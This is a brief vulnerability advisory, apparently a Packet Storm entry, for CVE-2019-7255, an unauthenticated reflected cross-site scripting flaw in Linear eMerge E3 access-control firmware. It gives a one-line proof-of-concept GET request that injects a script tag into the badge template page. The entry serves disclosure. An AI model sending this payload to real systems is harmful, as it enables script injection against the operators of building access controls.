Linear eMerge E3 1.00-06 Cross Site Scripting

2019-11-12T00:00:00
ID PACKETSTORM:155253
Type packetstorm
Reporter LiquidWorm
Modified 2019-11-12T00:00:00

Description

                                        
                                            `  
Linear eMerge E3 Unauthenticated Reflected XSS  
Affected version: <=1.00-06  
CVE: CVE-2019-7255  
Advisory: https://applied-risk.com/resources/ar-2019-005  
  
Discovered by Gjoko 'LiquidWorm' Krstic  
  
PoC:  
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1  
`